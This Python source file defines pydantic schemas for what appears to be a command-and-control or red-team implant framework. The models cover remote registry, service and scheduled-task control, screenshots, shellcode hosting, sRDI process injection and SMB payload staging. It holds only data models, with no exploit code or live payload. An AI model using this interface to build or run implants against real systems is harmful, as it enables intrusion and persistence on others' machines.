@autocomplete
class PowershellLoadResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class PowershellStageResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class PowershellUnstageResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class ProcessExecuteBaseResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class ProcessListResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    processes: Optional[List[Process]] = Field(
        [],
        description="Complete list of queriable processes",
        example=[
            {"ppid": 0, "pid": 1, "sess": 0, "name": "System"},
            {
                "ppid": 567,
                "pid": 321,
                "sess": 1,
                "arch": "x86",
                "name": "chrome.exe",
                "owner": "ACME\\John",
                "path": "C:\\Google\\chrome.exe",
            },
            {
                "ppid": 567,
                "pid": 432,
                "sess": 1,
                "arch": "x64",
                "name": "cmd.exe",
                "owner": "ACME\\John",
                "path": "C:\\Windows\\System32\\cmd.exe",
            },
        ],
        title="Processes",
    )


@autocomplete
class ProcessPowershellResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: Optional[str] = Field(
        "",
        description="Output from powershell.exe",
        example="Major  Minor  Build  Revision\n-----  -----  -----  --------\n5      1      19041  1",
        title="Output",
    )


@autocomplete
class ProcessShellResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: Optional[str] = Field(
        "",
        description="Output from cmd.exe",
        example="Volume in drive C has no label.\nVolume Serial Number is 9ED1-36D3",
        title="Output",
    )


@autocomplete
class ProcessStartResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class ProfileInResponse(Schema):
    id: UUID = Field(..., title="Id")
    tool: Tool = Field(...)
    name: str = Field(..., max_length=265, title="Name")
    data: Dict[str, Any] = Field(..., title="Data")
    updated_at: datetime = Field(..., alias="updatedAt", title="Updatedat")


@autocomplete
class RegistryCreateArguments(Schema):
    path: str = Field(
        ...,
        description="Full registry path",
        example="HKEY_LOCAL_MACHINE\\Software",
        title="Path",
    )
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    value: Optional[str] = Field("", description="Registry sub-value name", example="MyValue", title="Value")
    vtype: Optional[RegistryType] = Field("REG_NONE", description="Value type", example="REG_DWORD")
    data: Optional[str] = Field("", description="Registry sub-value name", example=1234, title="Data")
    force: Optional[bool] = Field(
        False,
        description="Overwrite existing entry if required",
        example=False,
        title="Force",
    )


@autocomplete
class RegistryCreateResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class RegistryDeleteResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class RegistryQueryResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    keys: Optional[List[str]] = Field(
        [],
        description="Sub-keys of the queried root key",
        example=[
            "HKEY_LOCAL_MACHINE\\Software\\Corp\\Cat",
            "HKEY_LOCAL_MACHINE\\Software\\Corp\\Dog",
        ],
        title="Keys",
    )
    values: Optional[List[RegistryValue]] = Field(
        [],
        description="Sub-values of the queried root key",
        example=[
            {"name": "LastAction", "type": "REG_SZ", "data": "Meow"},
            {"name": "MetaData", "type": "REG_BINARY", "data": "bWVvdw=="},
        ],
        title="Values",
    )


@autocomplete
class ScheduledTaskCreateExResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class ScheduledTaskCreateResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class ScheduledTaskDeleteResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class ScheduledTaskQueryResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    folders: Optional[List[str]] = Field(
        [],
        description="Sub-folders from query",
        example=["\\Microsoft", "\\Intel"],
        title="Folders",
    )
    tasks: Optional[List[TaskInfo]] = Field(
        [],
        description="Tasks results from query",
        example=[
            {
                "path": "Adobe Acrobat Update Task",
                "state": "ready",
                "lastRun": "2001-05-04 03:02:01",
                "lastResult": 0,
                "xml": "<xml>Example Task Xml</xml>",
            }
        ],
        title="Tasks",
    )


@autocomplete
class ScheduledTaskStartResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class ScheduledTaskStopResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class ScreenshotResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    data: Optional[BlobReferenceOrData] = Field(
        {"id": "null"},
        description="JPEG data from screen",
        example="EXAMPLE_JPEG",
        title="Data",
    )


@autocomplete
class ScriptOutput(Schema):
    type: StdioType = Field(..., description="Stdio type", example="out")
    message: str = Field(..., description="Message text", example="[+] Done.", title="Message")


@autocomplete
class ScriptResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: List[ScriptOutput] = Field(
        ...,
        description="Script output entries",
        example=[{"type": "out", "message": "[+] Done."}],
        title="Output",
    )


@autocomplete
class ServiceConfigBase(Schema):
    display_name: str = Field(..., alias="displayName", example="My Service", title="Displayname")
    binary_path: str = Field(..., alias="binaryPath", example="C:\\Windows\\service.exe", title="Binarypath")
    start_name: Optional[str] = Field(
        "NT AUTHORITY\\SYSTEM",
        alias="startName",
        example="NT AUTHORITY\\SYSTEM",
        title="Startname",
    )
    service_type: Optional[ServiceType] = Field("win32_own_process", alias="serviceType", example="win32_own_process")
    start_type: Optional[ServiceStartType] = Field("demand_start", alias="startType", example="demand_start")
    error_control: Optional[ServiceErrorControl] = Field("error_ignore", alias="errorControl", example="error_ignore")


@autocomplete
class ServiceConfigInCreate(Schema):
    display_name: str = Field(..., alias="displayName", example="My Service", title="Displayname")
    binary_path: str = Field(..., alias="binaryPath", example="C:\\Windows\\service.exe", title="Binarypath")
    start_name: Optional[str] = Field(
        "NT AUTHORITY\\SYSTEM",
        alias="startName",
        example="NT AUTHORITY\\SYSTEM",
        title="Startname",
    )
    service_type: Optional[ServiceType] = Field("win32_own_process", alias="serviceType", example="win32_own_process")
    start_type: Optional[ServiceStartType] = Field("demand_start", alias="startType", example="demand_start")
    error_control: Optional[ServiceErrorControl] = Field("error_ignore", alias="errorControl", example="error_ignore")
    name: str = Field(..., example="mysvc", title="Name")


@autocomplete
class ServiceConfigInResponse(Schema):
    display_name: str = Field(..., alias="displayName", example="My Service", title="Displayname")
    binary_path: str = Field(..., alias="binaryPath", example="C:\\Windows\\service.exe", title="Binarypath")
    start_name: Optional[str] = Field(
        "NT AUTHORITY\\SYSTEM",
        alias="startName",
        example="NT AUTHORITY\\SYSTEM",
        title="Startname",
    )
    service_type: Optional[ServiceType] = Field("win32_own_process", alias="serviceType", example="win32_own_process")
    start_type: Optional[ServiceStartType] = Field("demand_start", alias="startType", example="demand_start")
    error_control: Optional[ServiceErrorControl] = Field("error_ignore", alias="errorControl", example="error_ignore")
    description: str = Field(..., example="Do secret things", title="Description")
    load_order_group: str = Field(..., alias="loadOrderGroup", example="", title="Loadordergroup")
    dependencies: List[str] = Field(..., example=["spoolsv"], title="Dependencies")
    required_privileges: List[SePrivilege] = Field(..., alias="requiredPrivileges", example=["SeDebugPrivilege"])
    process_id: int = Field(..., alias="processId", example=1234, title="Processid")
    exit_code: int = Field(..., alias="exitCode", example=0, title="Exitcode")
    current_state: ServiceState = Field(..., alias="currentState")


@autocomplete
class ServiceCreateExArguments(Schema):
    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    config: ServiceConfigInCreate = Field(
        ...,
        description="Service configuration",
        example={
            "displayName": "My Service",
            "binaryPath": "C:\\Windows\\service.exe",
            "startName": "NT AUTHORITY\\SYSTEM",
            "serviceType": "win32_own_process",
            "startType": "demand_start",
            "errorControl": "error_ignore",
            "name": "mysvc",
        },
        title="Config",
    )


@autocomplete
class ServiceCreateExResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class ServiceCreateResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class ServiceDeleteResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class ServiceQueryResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    config: ServiceConfigInResponse = Field(
        ...,
        description="Full service configuration",
        example={
            "displayName": "My Service",
            "binaryPath": "C:\\Windows\\service.exe",
            "startName": "NT AUTHORITY\\SYSTEM",
            "serviceType": "win32_own_process",
            "startType": "demand_start",
            "errorControl": "error_ignore",
            "description": "Do secret things",
            "loadOrderGroup": "",
            "dependencies": ["spoolsv"],
            "requiredPrivileges": ["SeDebugPrivilege"],
            "processId": 1234,
            "exitCode": 0,
            "currentState": "running",
        },
        title="Config",
    )


@autocomplete
class ServiceResultsBase(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class ServiceStartResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class ServiceStopResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class ShareAddResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class ShareDeleteResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


@autocomplete
class ShareInfo(Schema):
    remote: str = Field(
        ...,
        description="Remote resource path",
        example="\\\\REMOTE\\Data",
        title="Remote",
    )
    local: Optional[str] = Field(
        None,
        description="Local resource path (drive letter)",
        example="D:",
        title="Local",
    )
    scope: ShareScope = Field(..., description="Resource scope", example="connected")
    rtype: ShareType = Field(..., description="Resource type", example="disk")
    dtype: ShareDisplayType = Field(..., description="Resource display type", example="share")


@autocomplete
class ShareListResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    shares: Optional[List[ShareInfo]] = Field(
        [],
        description="Network shares in the current session",
        example=[
            {
                "remote": "\\\\REMOTE\\C$",
                "scope": "connected",
                "rtype": "disk",
                "dtype": "share",
            },
            {
                "remote": "\\\\SERVER\\Data",
                "local": "D:",
                "scope": "remembered",
                "rtype": "disk",
                "dtype": "share",
            },
        ],
        title="Shares",
    )


@autocomplete
class TaskDetails(Schema):
    id: UUID = Field(..., title="Id")
    tool: Tool = Field(...)
    command: str = Field(..., title="Command")
    instance_id: Optional[UUID] = Field(None, alias="instanceId", title="Instanceid")
    instance_tag: Optional[str] = Field(None, alias="instanceTag", title="Instancetag")
    instance_name: Optional[str] = Field(None, alias="instanceName", title="Instancename")
    owner_id: Optional[UUID] = Field(None, alias="ownerId", title="Ownerid")
    owner: Optional[str] = Field(None, title="Owner")
    created_at: datetime = Field(..., alias="createdAt", title="Createdat")
    updated_at: datetime = Field(..., alias="updatedAt", title="Updatedat")
    delivery: TaskDelivery = Field(...)
    status: TaskStatus = Field(...)
    context: TaskContext = Field(...)
    arguments: TaskArguments = Field(...)
    results: TaskResults = Field(...)


@autocomplete
class TasksWithCursor(Schema):
    next_cursor: Optional[int] = Field(None, alias="nextCursor", title="Nextcursor")
    tasks: List[TaskDetails] = Field(..., title="Tasks")


@autocomplete
class UserInCreate(Schema):
    username: str = Field(..., max_length=25, title="Username")
    password: str = Field(..., max_length=100, title="Password")
    role: UserRole
    is_active: Optional[bool] = Field(True, alias="isActive", title="Isactive")


@autocomplete
class UserInResponse(Schema):
    id: UUID = Field(..., title="Id")
    username: str = Field(..., max_length=25, title="Username")
    role: UserRole = Field(...)
    is_active: bool = Field(..., alias="isActive", title="Isactive")


@autocomplete
class UserInUpdate(Schema):
    username: Optional[str] = Field(None, max_length=25, title="Username")
    password: Optional[str] = Field(None, max_length=100, title="Password")
    role: Optional[UserRole] = None
    is_active: Optional[bool] = Field(None, alias="isActive", title="Isactive")


@autocomplete
class BlobReferenceOrPayloadOrData(Schema):
    id: Optional[str] = Field(None, description="Blob identifier", title="Id")
    name: Optional[str] = Field(None, description="Contextual name", title="Name")
    data: Optional[bytes] = Field(None, description="Raw data", title="Data")
    payload: Optional[PayloadSeed] = Field(None, description="Payload seed", title="Payload")


@autocomplete
class HostShellcodeArguments(Schema):
    srdi_exported_function: Optional[str] = Field(
        "none",
        alias="srdiExportedFunction",
        description="Exported function to execute post load [sRDI]",
        example="MyExport",
        title="Srdiexportedfunction",
    )
    srdi_user_data: Optional[BlobReferenceOrData] = Field(
        {"id": "null"},
        alias="srdiUserData",
        description="User data to pass to exported function [sRDI]",
        example="user_data",
        title="Srdiuserdata",
    )
    srdi_flags: Optional[int] = Field(
        0,
        alias="srdiFlags",
        description="Configuration flags for loading process [sRDI]",
        title="Srdiflags",
    )
    encoding: Optional[HostingEncoding] = Field("base64", description="Encoding for binary data", example="base64")
    base_url: Optional[str] = Field(
        "",
        alias="baseUrl",
        description="Base URL (default is from profile)",
        example="http://mycustom.com",
        title="Baseurl",
    )
    endpoint: str = Field(
        ...,
        description="Web endpoint path to host data",
        example="/custom",
        title="Endpoint",
    )
    payload: BlobReferenceOrPayloadOrData = Field(
        ...,
        description="Payload or blob to convert to shellcode and host",
        title="Payload",
    )


@autocomplete
class InjectArguments(Schema):
    srdi_exported_function: Optional[str] = Field(
        "none",
        alias="srdiExportedFunction",
        description="Exported function to execute post load [sRDI]",
        example="MyExport",
        title="Srdiexportedfunction",
    )
    srdi_user_data: Optional[BlobReferenceOrData] = Field(
        {"id": "null"},
        alias="srdiUserData",
        description="User data to pass to exported function [sRDI]",
        example="user_data",
        title="Srdiuserdata",
    )
    srdi_flags: Optional[int] = Field(
        0,
        alias="srdiFlags",
        description="Configuration flags for loading process [sRDI]",
        title="Srdiflags",
    )
    process: Optional[str] = Field(
        "",
        description="Process name/pid to inject into (otherwise local)",
        example="explorer.exe",
        title="Process",
    )
    payload: BlobReferenceOrPayloadOrData = Field(
        ...,
        description="Payload data to inject",
        example="EXAMPLE_PAYLOAD",
        title="Payload",
    )
    technique: Optional[InjectionTechnique] = Field(
        "standard", description="Injection technique/procedure", example="standard"
    )
    skip_conversion: Optional[bool] = Field(
        False,
        alias="skipConversion",
        description="Skip sRDI conversion (payload is already shellcode)",
        example=False,
        title="Skipconversion",
    )


@autocomplete
class SmbStageArguments(Schema):
    srdi_exported_function: Optional[str] = Field(
        "none",
        alias="srdiExportedFunction",
        description="Exported function to execute post load [sRDI]",
        example="MyExport",
        title="Srdiexportedfunction",
    )
    srdi_user_data: Optional[BlobReferenceOrData] = Field(
        {"id": "null"},
        alias="srdiUserData",
        description="User data to pass to exported function [sRDI]",
        example="user_data",
        title="Srdiuserdata",
    )
    srdi_flags: Optional[int] = Field(
        0,
        alias="srdiFlags",
        description="Configuration flags for loading process [sRDI]",
        title="Srdiflags",
    )
    host: str = Field(..., description="Hostname or IP address", example="ADAM-PC", title="Host")
    payload: BlobReferenceOrPayloadOrData = Field(
        ..., description="Payload to stage", example="EXAMPLE_PAYLOAD", title="Payload"
    )
    migrate: Optional[str] = Field(
        "local",
        description="Migrate to this process during stage (otherwise `local`)",
        title="Migrate",
    )
    pipe: Optional[str] = Field(
        "",
        description="Named pipe for stage delivery (default = profile['stagers']['native']['pipe'])",
        title="Pipe",
    )
    convert: Optional[bool] = Field(False, description="Convert to shellcode before delivery", title="Convert")
    timeout: Optional[int] = Field(
        0,
        description="Named pipe timeout in seconds (default = profile['smb']['timeout'])",
        title="Timeout",
    )
